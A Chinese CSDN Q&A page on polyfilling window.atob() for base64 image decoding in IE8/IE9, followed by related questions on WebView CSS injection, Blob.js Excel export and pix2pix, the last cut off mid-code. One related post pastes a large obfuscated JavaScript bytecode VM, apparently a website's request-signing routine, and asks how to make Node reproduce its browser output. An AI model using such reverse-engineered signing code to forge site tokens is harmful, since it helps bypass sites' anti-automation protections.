base 图片解码 window.atob() ie9 以下 未定义 解决 10C

base 图片解码 window.atob() ie9 以下 未定义 解决 IE9 ie8

function base64Img2Blob(code){

            var parts = code.split(';base64,');
            var contentType = parts[0].split(':')[1];
            var raw = window.atob(parts[1]);
            var rawLength = raw.length;

            var uInt8Array = new Uint8Array(rawLength);

            for (var i = 0; i < rawLength; ++i) {
              uInt8Array[i] = raw.charCodeAt(i);
            }

            return new Blob([uInt8Array], {type: contentType}); 
        }`

3个回答

IE8中js不支持得太多了,你如果只是要做base64解码然后显示图片,不如用flex/flash之类的插件做。

自己用js写一个atob实现,好像网站有现成的,你找找看。

引入兼容库jQuery.base64.js

if (!window.btoa) window.btoa = $.base64.btoa;
if (!window.atob) window.atob = $.base64.atob;

不过我估计代码里的Uint8Array、Blob也是不兼容的。

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
微信里,安卓真机atob( ) 解码base64不起作用?
![图片说明](https://img-ask.csdn.net/upload/201911/27/1574836297_969951.png) wx.getLocalImgData获取返回的base64图片,用atob()解码安卓真机不起作用?
android webView 修改页面字体颜色
webview加载一个界面后,在onPageFinished中加入修改页面字体颜色css,如下String nightCode = ""; try { InputStream is = getResources().openRawResource(R.raw.day); byte[] buffer; buffer = new byte[is.available()]; is.read(buffer); is.close(); nightCode = Base64.encodeToString(buffer, Base64.NO_WRAP); } catch (IOException e) { e.printStackTrace(); } mWeb.loadUrl("javascript:(function() {" + "var parent = document.getElementsByTagName('head').item(0);" + "var style = document.createElement('style');" + "style.type = 'text/css';" + "style.innerHTML = window.atob('" + nightCode + "');" + "parent.appendChild(style)" + "})();"); 加载完成后,每次都是先显示原来的页面,过一秒左右在页面所有字体颜色都修改了,有什么办法显示页面之前就替换好字体颜色,先谢谢各位了。
webview自定义字体显示不出来
webview自定义字体显示不出来,颜色、字体大小、背景什么的都能获得,就这个font-family获取不了,请问是什么原因呢?谢谢啊!先上主要代码: ``` public class MainActivity extends BaseActivity { Context context; WebView webview; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); context = getApplicationContext(); setContentView(R.layout.main); findViews(); init(); webview.loadUrl("http://192.168.3.4:8080/resource/jsp/test.html"); } private void findViews(){ webview = (WebView)findViewById(R.id.webview); } private void init(){ webview.getSettings().setJavaScriptEnabled(true); //可用JS webview.setBackgroundColor(Color.WHITE); webview.getSettings().setDefaultTextEncodingName("UTF-8"); webview.canGoBackOrForward(1); webview.setWebChromeClient(new WebChromeClient()); webview.setWebViewClient(new WebViewClient(){ @Override public void onPageStarted(WebView view, String url, Bitmap favicon) { // TODO Auto-generated method stub super.onPageStarted(view, url, favicon); } @Override public void onPageFinished(WebView view, String url) { // TODO Auto-generated method stub super.onPageFinished(view, url); injectCSS(); } }); } private void injectCSS() { handler.post(new Runnable() { @Override public void run() { // TODO Auto-generated method stub try { InputStream inputStream = getAssets().open("style.css"); byte[] buffer = new byte[inputStream.available()]; inputStream.read(buffer); inputStream.close(); String encoded = Base64.encodeToString(buffer, Base64.NO_WRAP); String js = "javascript:(function() {" + "var parent = document.getElementsByTagName('head').item(0);" + "var style = document.createElement('style');" + "style.type = 'text/css';" + "style.innerHTML = window.atob('" + encoded + "');" + "parent.appendChild(style)" + "})()"; webview.loadUrl(js); } catch (Exception e) { e.printStackTrace(); } } }); } } ``` 测试页面test.html ``` <html> <head> </head> <body id="main"> <a class="agname" href="#">这里是测试页面</a><br/> </body> </html> ``` 安卓工程目录assets下面放了两个文件,分别是style.css和yzxy.ttf,yzxy.ttf是字体;style.css的代码如下: ``` @font-face { font-family: typeface; src: url("file:///android_asset/fzxy.ttf") } .agname { font-family: typeface; font-size: 30px; color:red; } ```
node的v8引擎与浏览器运行结果 不一样
没有报错也没有异常,但是运行结果就是不一样, 如何修改才能让node的运行打码结果和浏览器是一致的 ``` var window = this; function t(e) { return typeof e } var A = "2.0", __g = {}; function s() {} function i(e) { this.t = (2048 & e) >> 11, this.s = (1536 & e) >> 9, this.i = 511 & e, this.h = 511 & e } function h(e) { this.s = (3072 & e) >> 10, this.h = 1023 & e } function a(e) { this.a = (3072 & e) >> 10, this.c = (768 & e) >> 8, this.n = (192 & e) >> 6, this.t = 63 & e } function c(e) { this.s = e >> 10 & 3, this.i = 1023 & e } function n() {} function e(e) { this.a = (3072 & e) >> 10, this.c = (768 & e) >> 8, this.n = (192 & e) >> 6, this.t = 63 & e } function o(e) { this.h = (4095 & e) >> 2, this.t = 3 & e } function r(e) { this.s = e >> 10 & 3, this.i = e >> 2 & 255, this.t = 3 & e } s.prototype.e = function(e) { e.o = !1 }, i.prototype.e = function(e) { switch (this.t) { case 0: e.r[this.s] = this.i; break; case 1: e.r[this.s] = e.k[this.h] } }, h.prototype.e = function(e) { e.k[this.h] = e.r[this.s] }, a.prototype.e = function(e) { switch (this.t) { case 0: e.r[this.a] = e.r[this.c] + e.r[this.n]; break; case 1: e.r[this.a] = e.r[this.c] - e.r[this.n]; break; case 2: e.r[this.a] = e.r[this.c] * e.r[this.n]; break; case 3: e.r[this.a] = e.r[this.c] / e.r[this.n]; break; case 4: e.r[this.a] = e.r[this.c] % e.r[this.n]; break; case 5: e.r[this.a] = e.r[this.c] == e.r[this.n]; break; case 6: e.r[this.a] = e.r[this.c] >= e.r[this.n]; break; case 7: e.r[this.a] = e.r[this.c] || e.r[this.n]; break; case 8: e.r[this.a] = e.r[this.c] && e.r[this.n]; break; case 9: e.r[this.a] = e.r[this.c] !== e.r[this.n]; break; case 10: e.r[this.a] = t(e.r[this.c]); break; case 11: e.r[this.a] = e.r[this.c] in e.r[this.n]; break; case 12: e.r[this.a] = e.r[this.c] > e.r[this.n]; break; case 13: e.r[this.a] = -e.r[this.c]; break; case 14: e.r[this.a] = e.r[this.c] < e.r[this.n]; break; case 15: e.r[this.a] = e.r[this.c] & e.r[this.n]; break; case 16: e.r[this.a] = e.r[this.c] ^ e.r[this.n]; break; case 17: e.r[this.a] = e.r[this.c] << e.r[this.n]; break; case 18: e.r[this.a] = e.r[this.c] >>> e.r[this.n]; break; case 19: e.r[this.a] = e.r[this.c] | e.r[this.n]; break; case 20: e.r[this.a] = !e.r[this.c] } }, c.prototype.e = function(e) { e.Q.push(e.C), e.B.push(e.k), e.C = e.r[this.s], e.k = []; for (var t = 0; t < this.i; t++) e.k.unshift(e.f.pop()); e.g.push(e.f), e.f = [] }, n.prototype.e = function(e) { e.C = e.Q.pop(), e.k = e.B.pop(), e.f = e.g.pop() }, e.prototype.e = function(e) { switch (this.t) { case 0: e.u = e.r[this.a] >= e.r[this.c]; break; case 1: e.u = e.r[this.a] <= e.r[this.c]; break; case 2: e.u = e.r[this.a] > e.r[this.c]; break; case 3: e.u = e.r[this.a] < e.r[this.c]; break; case 4: e.u = e.r[this.a] == e.r[this.c]; break; case 5: e.u = e.r[this.a] != e.r[this.c]; break; case 6: e.u = e.r[this.a]; break; case 7: e.u = !e.r[this.a] } }, o.prototype.e = function(e) { switch (this.t) { case 0: e.C = this.h; break; case 1: e.u && (e.C = this.h); break; case 2: e.u || (e.C = this.h); break; case 3: e.C = this.h, e.w = null } e.u = !1 }, r.prototype.e = function(e) { switch (this.t) { case 0: for (var t = [], n = 0; n < this.i; n++) t.unshift(e.f.pop()); e.r[3] = e.r[this.s](t[0], t[1]); break; case 1: for (var r = e.f.pop(), o = [], i = 0; i < this.i; i++) o.unshift(e.f.pop()); e.r[3] = e.r[this.s][r](o[0], o[1]); break; case 2: for (var a = [], s = 0; s < this.i; s++) a.unshift(e.f.pop()); e.r[3] = new e.r[this.s](a[0], a[1]) } }; var k = function(e) { for (var t = 66, n = [], r = 0; r < e.length; r++) { var o = 24 ^ e.charCodeAt(r) ^ t; //console.log(o) n.push(String.fromCharCode(o)), t = o } return n.join("") }; function Q(e) { this.t = (4095 & e) >> 10, this.s = (1023 & e) >> 8, this.i = 1023 & e, this.h = 63 & e } function C(e) { this.t = (4095 & e) >> 10, this.a = (1023 & e) >> 8, this.c = (255 & e) >> 6 } function B(e) { this.s = (3072 & e) >> 10, this.h = 1023 & e } function f(e) { this.h = 4095 & e } function g(e) { this.s = (3072 & e) >> 10 } function u(e) { this.h = 4095 & e } function w(e) { this.t = (3840 & e) >> 8, this.s = (192 & e) >> 6, this.i = 63 & e } function G() { this.r = [0, 0, 0, 0], this.C = 0, this.Q = [], this.k = [], this.B = [], this.f = [], this.g = [], this.u = !1, this.G = [], this.b = [], this.o = !1, this.w = null, this.U = null, this.F = [], this.R = 0, this.J = { 0: s, 1: i, 2: h, 3: a, 4: c, 5: n, 6: e, 7: o, 8: r, 9: Q, 10: C, 11: B, 12: f, 13: g, 14: u, 15: w } } Q.prototype.e = function(e) { switch (this.t) { case 0: e.f.push(e.r[this.s]); break; case 1: e.f.push(this.i); break; case 2: e.f.push(e.k[this.h]); break; case 3: e.f.push(k(e.b[this.h])) } }, C.prototype.e = function(A) { switch (this.t) { case 0: var t = A.f.pop(); A.r[this.a] = A.r[this.c][t]; break; case 1: var s = A.f.pop(), i = A.f.pop(); A.r[this.c][s] = i; break; case 2: var h = A.f.pop(); A.r[this.a] = eval(h) } }, B.prototype.e = function(e) { e.r[this.s] = k(e.b[this.h]) }, f.prototype.e = function(e) { e.w = this.h }, g.prototype.e = function(e) { throw e.r[this.s] }, u.prototype.e = function(e) { var t = this, n = [0]; e.k.forEach(function(e) { n.push(e) }); var r = function(r) { var o = new G; return o.k = n, o.k[0] = r, o.v(e.G, t.h, e.b, e.F), o.r[3] }; r.toString = function() { return "() { [native code] }" }, e.r[3] = r }, w.prototype.e = function(e) { switch (this.t) { case 0: for (var t = {}, n = 0; n < this.i; n++) { var r = e.f.pop(); t[e.f.pop()] = r } e.r[this.s] = t; break; case 1: for (var o = [], i = 0; i < this.i; i++) o.unshift(e.f.pop()); e.r[this.s] = o } }, G.prototype.D = function(e) { for (var t = atob(e), n = t.charCodeAt(0) << 8 | t.charCodeAt(1), r = [], o = 2; o < n + 2; o += 2) r.push(t.charCodeAt(o) << 8 | t.charCodeAt(o + 1)); this.G = r; for (var i = [], a = n + 2; a < t.length;) { var s = t.charCodeAt(a) << 8 | t.charCodeAt(a + 1), c = t.slice(a + 2, a + 2 + s); i.push(c), a += s + 2 } this.b = i }, G.prototype.v = function(e, t, n) { var t = t || 0; var n = n || []; var mn = "string" == typeof e ? this.D(e) : (this.G = e, this.b = n) this.o = !0 this.C = t; this.R = new Date().getTime() for (; this.o;) { var r = this.G[this.C++]; if ("number" != typeof r) break; var o = new Date().getTime(); if (500 < o - this.R) return; this.R = o; try { this.e(r) } catch (e) { this.U = e, this.w && (this.C = this.w) } } }, G.prototype.e = function(e) { var t = (61440 & e) >> 12; new this.J[t](e).e(this) }, "undefined" != typeof window && (new G).v("AxjgB5MAnACoAJwBpAAAABAAIAKcAqgAMAq0AzRJZAZwUpwCqACQACACGAKcBKAAIAOcBagAIAQYAjAUGgKcBqFAuAc5hTSHZAZwqrAIGgA0QJEAJAAYAzAUGgOcCaFANRQ0R2QGcOKwChoANECRACQAsAuQABgDnAmgAJwMgAGcDYwFEAAzBmAGcSqwDhoANECRACQAGAKcD6AAGgKcEKFANEcYApwRoAAxB2AGcXKwEhoANECRACQAGAKcE6AAGgKcFKFANEdkBnGqsBUaADRAkQAkABgCnBagAGAGcdKwFxoANECRACQAGAKcGKAAYAZx+rAZGgA0QJEAJAAYA5waoABgBnIisBsaADRAkQAkABgCnBygABoCnB2hQDRHZAZyWrAeGgA0QJEAJAAYBJwfoAAwFGAGcoawIBoANECRACQAGAOQALAJkAAYBJwfgAlsBnK+sCEaADRAkQAkABgDkACwGpAAGAScH4AJbAZy9rAiGgA0QJEAJACwI5AAGAScH6AAkACcJKgAnCWgAJwmoACcJ4AFnA2MBRAAMw5gBnNasCgaADRAkQAkABgBEio0R5EAJAGwKSAFGACcKqAAEgM0RCQGGAYSATRFZAZzshgAtCs0QCQAGAYSAjRFZAZz1hgAtCw0QCQAEAAgB7AtIAgYAJwqoAASATRBJAkYCRIANEZkBnYqEAgaBxQBOYAoBxQEOYQ0giQKGAmQABgAnC6ABRgBGgo0UhD/MQ8zECALEAgaBxQBOYAoBxQEOYQ0gpEAJAoYARoKNFIQ/zEPkAAgChgLGgkUATmBkgAaAJwuhAUaCjdQFAg5kTSTJAsQCBoHFAE5gCgHFAQ5hDSCkQAkChgBGgo0UhD/MQ+QACAKGAsaCRQCOYGSABoAnC6EBRoKN1AUEDmRNJMkCxgFGgsUPzmPkgAaCJwvhAU0wCQFGAUaCxQGOZISPzZPkQAaCJwvhAU0wCQFGAUaCxQMOZISPzZPkQAaCJwvhAU0wCQFGAUaCxQSOZISPzZPkQAaCJwvhAU0wCQFGAkSAzRBJAlz/B4FUAAAAwUYIAAIBSITFQkTERwABi0GHxITAAAJLwMSGRsXHxMZAAk0Fw8HFh4NAwUABhU1EBceDwAENBcUEAAGNBkTGRcBAAFKAAkvHg4PKz4aEwIAAUsACDIVHB0QEQ4YAAsuAzs7AAoPKToKDgAHMx8SGQUvMQABSAALORoVGCQgERcCAxoACAU3ABEXAgMaAAsFGDcAERcCAxoUCgABSQAGOA8LGBsPAAYYLwsYGw8AAU4ABD8QHAUAAU8ABSkbCQ4BAAFMAAktCh8eDgMHCw8AAU0ADT4TGjQsGQMaFA0FHhkAFz4TGjQsGQMaFA0FHhk1NBkCHgUbGBEPAAFCABg9GgkjIAEmOgUHDQ8eFSU5DggJAwEcAwUAAUMAAUAAAUEADQEtFw0FBwtdWxQTGSAACBwrAxUPBR4ZAAkqGgUDAwMVEQ0ACC4DJD8eAx8RAAQ5GhUYAAFGAAAABjYRExELBAACWhgAAVoAQAg/PTw0NxcQPCQ5C3JZEBs9fkcnDRcUAXZia0Q4EhQgXHojMBY3MWVCNT0uDhMXcGQ7AUFPHigkQUwQFkhaAkEACjkTEQspNBMZPC0ABjkTEQsrLQ=="); function atob(t) { var n, r, e = String(t).replace(/=+$/, ""), i = 0, a = 0, o = "" for (; r = e.charAt(a++);~r && (n = i % 4 ? 64 * n + r : r, i++ % 4) ? o += String.fromCharCode(255 & n >> (-2 * i & 6)) : 0) r = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(r); return o }; function b(e) { var encode = encodeURIComponent(e); console.log(encode) var mngg = __g; console.log(mngg._encrypt) var mnsd = mngg._encrypt(encode) return mnsd; }; console.log(b("sms_type=text")) //正确输出应该是KUVBebS0gLNOb9oVBcSM,v8输出是a_pKgbw92LkYQgpGcqVm2JFX ```
第一次用这个软件,怎么导出Excel。网上找的一个方法有点不会用。
![图片说明](https://img-ask.csdn.net/upload/201904/19/1555641778_73692.png)![图片说明](https://img-ask.csdn.net/upload/201904/19/1555644548_292914.png) ![图片说明](https://img-ask.csdn.net/upload/201904/19/1555641801_938006.png) Blob.js ``` (function (view) { "use strict"; view.URL = view.URL || view.webkitURL; if (view.Blob && view.URL) { try { new Blob; return; } catch (e) {} } // Internally we use a BlobBuilder implementation to base Blob off of // in order to support older browsers that only have BlobBuilder var BlobBuilder = view.BlobBuilder || view.WebKitBlobBuilder || view.MozBlobBuilder || (function(view) { var get_class = function(object) { return Object.prototype.toString.call(object).match(/^\[object\s(.*)\]$/)[1]; } , FakeBlobBuilder = function BlobBuilder() { this.data = []; } , FakeBlob = function Blob(data, type, encoding) { this.data = data; this.size = data.length; this.type = type; this.encoding = encoding; } , FBB_proto = FakeBlobBuilder.prototype , FB_proto = FakeBlob.prototype , FileReaderSync = view.FileReaderSync , FileException = function(type) { this.code = this[this.name = type]; } , file_ex_codes = ( "NOT_FOUND_ERR SECURITY_ERR ABORT_ERR NOT_READABLE_ERR ENCODING_ERR " + "NO_MODIFICATION_ALLOWED_ERR INVALID_STATE_ERR SYNTAX_ERR" ).split(" ") , file_ex_code = file_ex_codes.length , real_URL = view.URL || view.webkitURL || view , real_create_object_URL = real_URL.createObjectURL , real_revoke_object_URL = real_URL.revokeObjectURL , URL = real_URL , btoa = view.btoa , atob = view.atob , ArrayBuffer = view.ArrayBuffer , Uint8Array = view.Uint8Array ; FakeBlob.fake = FB_proto.fake = true; while (file_ex_code--) { FileException.prototype[file_ex_codes[file_ex_code]] = file_ex_code + 1; } if (!real_URL.createObjectURL) { URL = view.URL = {}; } URL.createObjectURL = function(blob) { var type = blob.type , data_URI_header ; if (type === null) { type = "application/octet-stream"; } if (blob instanceof FakeBlob) { data_URI_header = "data:" + type; if (blob.encoding === "base64") { return data_URI_header + ";base64," + blob.data; } else if (blob.encoding === "URI") { return data_URI_header + "," + decodeURIComponent(blob.data); } if (btoa) { return data_URI_header + ";base64," + btoa(blob.data); } else { return data_URI_header + "," + encodeURIComponent(blob.data); } } else if (real_create_object_URL) { return real_create_object_URL.call(real_URL, blob); } }; URL.revokeObjectURL = function(object_URL) { if (object_URL.substring(0, 5) !== "data:" && real_revoke_object_URL) { real_revoke_object_URL.call(real_URL, object_URL); } }; FBB_proto.append = function(data/*, endings*/) { var bb = this.data; // decode data to a binary string if (Uint8Array && (data instanceof ArrayBuffer || data instanceof Uint8Array)) { var str = "" , buf = new Uint8Array(data) , i = 0 , buf_len = buf.length ; for (; i < buf_len; i++) { str += String.fromCharCode(buf[i]); } bb.push(str); } else if (get_class(data) === "Blob" || get_class(data) === "File") { if (FileReaderSync) { var fr = new FileReaderSync; bb.push(fr.readAsBinaryString(data)); } else { // async FileReader won't work as BlobBuilder is sync throw new FileException("NOT_READABLE_ERR"); } } else if (data instanceof FakeBlob) { if (data.encoding === "base64" && atob) { bb.push(atob(data.data)); } else if (data.encoding === "URI") { bb.push(decodeURIComponent(data.data)); } else if (data.encoding === "raw") { bb.push(data.data); } } else { if (typeof data !== "string") { data += ""; // convert unsupported types to strings } // decode UTF-16 to binary string bb.push(unescape(encodeURIComponent(data))); } }; FBB_proto.getBlob = function(type) { if (!arguments.length) { type = null; } return new FakeBlob(this.data.join(""), type, "raw"); }; FBB_proto.toString = function() { return "[object BlobBuilder]"; }; FB_proto.slice = function(start, end, type) { var args = arguments.length; if (args < 3) { type = null; } return new FakeBlob( this.data.slice(start, args > 1 ? end : this.data.length) , type , this.encoding ); }; FB_proto.toString = function() { return "[object Blob]"; }; FB_proto.close = function() { this.size = this.data.length = 0; }; return FakeBlobBuilder; }(view)); view.Blob = function Blob(blobParts, options) { var type = options ? (options.type || "") : ""; var builder = new BlobBuilder(); if (blobParts) { for (var i = 0, len = blobParts.length; i < len; i++) { builder.append(blobParts[i]); } } return builder.getBlob(type); }; }(typeof self !== "undefined" && self || typeof window !== "undefined" && window || this.content || this)); ``` 这是Export2Excel.js ``` /* eslint-disable */ require('script-loader!file-saver'); require('script-loader!@/wlw/src/ExportFile');//这里是文件路径 import XLSX from 'xlsx/types' function generateArray(table) { var out = []; var rows = table.querySelectorAll('tr'); var ranges = []; for (var R = 0; R < rows.length; ++R) { var outRow = []; var row = rows[R]; var columns = row.querySelectorAll('td'); for (var C = 0; C < columns.length; ++C) { var cell = columns[C]; var colspan = cell.getAttribute('colspan'); var rowspan = cell.getAttribute('rowspan'); var cellValue = cell.innerText; if (cellValue !== "" && cellValue == +cellValue) cellValue = +cellValue; //Skip ranges ranges.forEach(function (range) { if (R >= range.s.r && R <= range.e.r && outRow.length >= range.s.c && outRow.length <= range.e.c) { for (var i = 0; i <= range.e.c - range.s.c; ++i) outRow.push(null); } }); //Handle Row Span if (rowspan || colspan) { rowspan = rowspan || 1; colspan = colspan || 1; ranges.push({ s: { r: R, c: outRow.length }, e: { r: R + rowspan - 1, c: outRow.length + colspan - 1 } }); }; //Handle Value outRow.push(cellValue !== "" ? cellValue : null); //Handle Colspan if (colspan) for (var k = 0; k < colspan - 1; ++k) outRow.push(null); } out.push(outRow); } return [out, ranges]; }; function datenum(v, date1904) { if (date1904) v += 1462; var epoch = Date.parse(v); return (epoch - new Date(Date.UTC(1899, 11, 30))) / (24 * 60 * 60 * 1000); } function sheet_from_array_of_arrays(data, opts) { var ws = {}; var range = { s: { c: 10000000, r: 10000000 }, e: { c: 0, r: 0 } }; for (var R = 0; R != data.length; ++R) { for (var C = 0; C != data[R].length; ++C) { if (range.s.r > R) range.s.r = R; if (range.s.c > C) range.s.c = C; if (range.e.r < R) range.e.r = R; if (range.e.c < C) range.e.c = C; var cell = { v: data[R][C] }; if (cell.v == null) continue; var cell_ref = XLSX.utils.encode_cell({ c: C, r: R }); if (typeof cell.v === 'number') cell.t = 'n'; else if (typeof cell.v === 'boolean') cell.t = 'b'; else if (cell.v instanceof Date) { cell.t = 'n'; cell.z = XLSX.SSF._table[14]; cell.v = datenum(cell.v); } else cell.t = 's'; ws[cell_ref] = cell; } } if (range.s.c < 10000000) ws['!ref'] = XLSX.utils.encode_range(range); return ws; } function Workbook() { if (!(this instanceof Workbook)) return new Workbook(); this.SheetNames = []; this.Sheets = {}; } function s2ab(s) { var buf = new ArrayBuffer(s.length); var view = new Uint8Array(buf); for (var i = 0; i != s.length; ++i) view[i] = s.charCodeAt(i) & 0xFF; return buf; } export function export_table_to_excel(id) { var theTable = document.getElementById(id); var oo = generateArray(theTable); var ranges = oo[1]; /* original data */ var data = oo[0]; var ws_name = "SheetJS"; var wb = new Workbook(), ws = sheet_from_array_of_arrays(data); /* add ranges to worksheet */ // ws['!cols'] = ['apple', 'banan']; ws['!merges'] = ranges; /* add worksheet to workbook */ wb.SheetNames.push(ws_name); wb.Sheets[ws_name] = ws; var wbout = XLSX.write(wb, { bookType: 'xlsx', bookSST: false, type: 'binary' }); saveAs(new Blob([s2ab(wbout)], { type: "application/octet-stream" }), "test.xlsx") } export function export_json_to_excel(th, jsonData, defaultTitle) { /* original data */ var data = jsonData; data.unshift(th); var ws_name = "SheetJS"; var wb = new Workbook(), ws = sheet_from_array_of_arrays(data); /*设置worksheet每列的最大宽度*/ const colWidth = data.map(row => row.map(val => { /*先判断是否为null/undefined*/ if (val == null) { return { 'wch': 10 }; } /*再判断是否为中文*/ else if (val.toString().charCodeAt(0) > 255) { return { 'wch': val.toString().length * 2 }; } else { return { 'wch': val.toString().length }; } })) /*以第一行为初始值*/ let result = colWidth[0]; for (let i = 1; i < colWidth.length; i++) { for (let j = 0; j < colWidth[i].length; j++) { if (result[j]['wch'] < colWidth[i][j]['wch']) { result[j]['wch'] = colWidth[i][j]['wch']; } } } ws['!cols'] = result; /* add worksheet to workbook */ wb.SheetNames.push(ws_name); wb.Sheets[ws_name] = ws; var wbout = XLSX.write(wb, { bookType: 'xlsx', bookSST: false, type: 'binary' }); var title = defaultTitle || '列表' saveAs(new Blob([s2ab(wbout)], { type: "application/octet-stream" }), title + ".xlsx") } ```
blobjs源码在这里为什么
Blob.js /* Blob.js * A Blob implementation. * 2014-07-24 * * By Eli Grey, http://eligrey.com * By Devin Samarin, https://github.com/dsamarin * License: MIT * See https://github.com/eligrey/Blob.js/blob/master/LICENSE.md */ /*global self, unescape */ /*jslint bitwise: true, regexp: true, confusion: true, es5: true, vars: true, white: true, plusplus: true */ /*! @source http://purl.eligrey.com/github/Blob.js/blob/master/Blob.js */ (function (view) { "use strict"; view.URL = view.URL || view.webkitURL; if (view.Blob && view.URL) { try { new Blob; return; } catch (e) {} } // Internally we use a BlobBuilder implementation to base Blob off of // in order to support older browsers that only have BlobBuilder var BlobBuilder = view.BlobBuilder || view.WebKitBlobBuilder || view.MozBlobBuilder || (function(view) { var get_class = function(object) { return Object.prototype.toString.call(object).match(/^\[object\s(.*)\]$/)[1]; } , FakeBlobBuilder = function BlobBuilder() { this.data = []; } , FakeBlob = function Blob(data, type, encoding) { this.data = data; this.size = data.length; this.type = type; this.encoding = encoding; } , FBB_proto = FakeBlobBuilder.prototype , FB_proto = FakeBlob.prototype , FileReaderSync = view.FileReaderSync , FileException = function(type) { this.code = this[this.name = type]; } , file_ex_codes = ( "NOT_FOUND_ERR SECURITY_ERR ABORT_ERR NOT_READABLE_ERR ENCODING_ERR " + "NO_MODIFICATION_ALLOWED_ERR INVALID_STATE_ERR SYNTAX_ERR" ).split(" ") , file_ex_code = file_ex_codes.length , real_URL = view.URL || view.webkitURL || view , real_create_object_URL = real_URL.createObjectURL , real_revoke_object_URL = real_URL.revokeObjectURL , URL = real_URL , btoa = view.btoa , atob = view.atob , ArrayBuffer = view.ArrayBuffer , Uint8Array = view.Uint8Array , origin = /^[\w-]+:\/*\[?[\w\.:-]+\]?(?::[0-9]+)?/ ; FakeBlob.fake = FB_proto.fake = true; while (file_ex_code--) { FileException.prototype[file_ex_codes[file_ex_code]] = file_ex_code + 1; } // Polyfill URL if (!real_URL.createObjectURL) { URL = view.URL = function(uri) { var uri_info = document.createElementNS("http://www.w3.org/1999/xhtml", "a") , uri_origin ; uri_info.href = uri; if (!("origin" in uri_info)) { if (uri_info.protocol.toLowerCase() === "data:") { uri_info.origin = null; } else { uri_origin = uri.match(origin); uri_info.origin = uri_origin && uri_origin[1]; } } return uri_info; }; } URL.createObjectURL = function(blob) { var type = blob.type , data_URI_header ; if (type === null) { type = "application/octet-stream"; } if (blob instanceof FakeBlob) { data_URI_header = "data:" + type; if (blob.encoding === "base64") { return data_URI_header + ";base64," + blob.data; } else if (blob.encoding === "URI") { return data_URI_header + "," + decodeURIComponent(blob.data); } if (btoa) { return data_URI_header + ";base64," + btoa(blob.data); } else { return data_URI_header + "," + encodeURIComponent(blob.data); } } else if (real_create_object_URL) { return real_create_object_URL.call(real_URL, blob); } }; URL.revokeObjectURL = function(object_URL) { if (object_URL.substring(0, 5) !== "data:" && real_revoke_object_URL) { real_revoke_object_URL.call(real_URL, object_URL); } }; FBB_proto.append = function(data/*, endings*/) { var bb = this.data; // decode data to a binary string if (Uint8Array && (data instanceof ArrayBuffer || data instanceof Uint8Array)) { var str = "" , buf = new Uint8Array(data) , i = 0 , buf_len = buf.length ; for (; i < buf_len; i++) { str += String.fromCharCode(buf[i]); } bb.push(str); } else if (get_class(data) === "Blob" || get_class(data) === "File") { if (FileReaderSync) { var fr = new FileReaderSync; bb.push(fr.readAsBinaryString(data)); } else { // async FileReader won't work as BlobBuilder is sync throw new FileException("NOT_READABLE_ERR"); } } else if (data instanceof FakeBlob) { if (data.encoding === "base64" && atob) { bb.push(atob(data.data)); } else if (data.encoding === "URI") { bb.push(decodeURIComponent(data.data)); } else if (data.encoding === "raw") { bb.push(data.data); } } else { if (typeof data !== "string") { data += ""; // convert unsupported types to strings } // decode UTF-16 to binary string bb.push(unescape(encodeURIComponent(data))); } }; FBB_proto.getBlob = function(type) { if (!arguments.length) { type = null; } return new FakeBlob(this.data.join(""), type, "raw"); }; FBB_proto.toString = function() { return "[object BlobBuilder]"; }; FB_proto.slice = function(start, end, type) { var args = arguments.length; if (args < 3) { type = null; } return new FakeBlob( this.data.slice(start, args > 1 ? end : this.data.length) , type , this.encoding ); }; FB_proto.toString = function() { return "[object Blob]"; }; FB_proto.close = function() { this.size = 0; delete this.data; }; return FakeBlobBuilder; }(view)); view.Blob = function(blobParts, options) { var type = options ? (options.type || "") : ""; var builder = new BlobBuilder(); if (blobParts) { for (var i = 0, len = blobParts.length; i < len; i++) { if (Uint8Array && blobParts[i] instanceof Uint8Array) { builder.append(blobParts[i].buffer); } else { builder.append(blobParts[i]); } } } var blob = builder.getBlob(type); if (!blob.slice && blob.webkitSlice) { blob.slice = blob.webkitSlice; } return blob; }; var getPrototypeOf = Object.getPrototypeOf || function(object) { return object.__proto__; }; view.Blob.prototype = getPrototypeOf(new view.Blob()); }(typeof self !== "undefined" && self || typeof window !== "undefined" && window || this.content || this));
基于tensorflow的pix2pix代码中如何做到输入图像和输出图像分辨率不一致
问题:例如在自己制作了成对的输入(input256×256 target 200×256)后,如何让输入图像和输出图像分辨率不一致,例如成对图像中:input的分辨率是256×256, output 和target都是200×256,需要修改哪里的参数。 论文参考:《Image-to-Image Translation with Conditional Adversarial Networks》 代码参考:https://blog.csdn.net/MOU_IT/article/details/80802407?utm_source=blogxgwz0 # coding=utf-8 from __future__ import absolute_import from __future__ import division from __future__ import print_function import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import tensorflow as tf import numpy as np import os import glob import random import collections import math import time # https://github.com/affinelayer/pix2pix-tensorflow train_input_dir = "D:/Project/pix2pix-tensorflow-master/facades/train/" # 训练集输入 train_output_dir = "D:/Project/pix2pix-tensorflow-master/facades/train_out/" # 训练集输出 test_input_dir = "D:/Project/pix2pix-tensorflow-master/facades/val/" # 测试集输入 test_output_dir = "D:/Project/pix2pix-tensorflow-master/facades/test_out/" # 测试集的输出 checkpoint = "D:/Project/pix2pix-tensorflow-master/facades/train_out/" # 保存结果的目录 seed = None max_steps = None # number of training steps (0 to disable) max_epochs = 200 # number of training epochs progress_freq = 50 # display progress every progress_freq steps trace_freq = 0 # trace execution every trace_freq steps display_freq = 50 # write current training images every display_freq steps save_freq = 500 # save model every save_freq steps, 0 to disable separable_conv = False # use separable convolutions in the generator aspect_ratio = 1 #aspect ratio of output images (width/height) batch_size = 1 # help="number of images in batch") which_direction = "BtoA" # choices=["AtoB", "BtoA"]) ngf = 64 # help="number of generator filters in first conv layer") ndf = 64 # help="number of discriminator filters in first conv layer") scale_size = 286 # help="scale images to this size before cropping to 256x256") flip = True # flip images horizontally no_flip = True # don't flip images horizontally lr = 0.0002 # initial learning rate for adam beta1 = 0.5 # momentum term of adam l1_weight = 100.0 # weight on L1 term for generator gradient gan_weight = 1.0 # weight on GAN term for generator gradient output_filetype = "png" # 输出图像的格式 EPS = 1e-12 # 极小数,防止梯度为损失为0 CROP_SIZE = 256 # 图片的裁剪大小 # 命名元组,用于存放加载的数据集合创建好的模型 Examples = 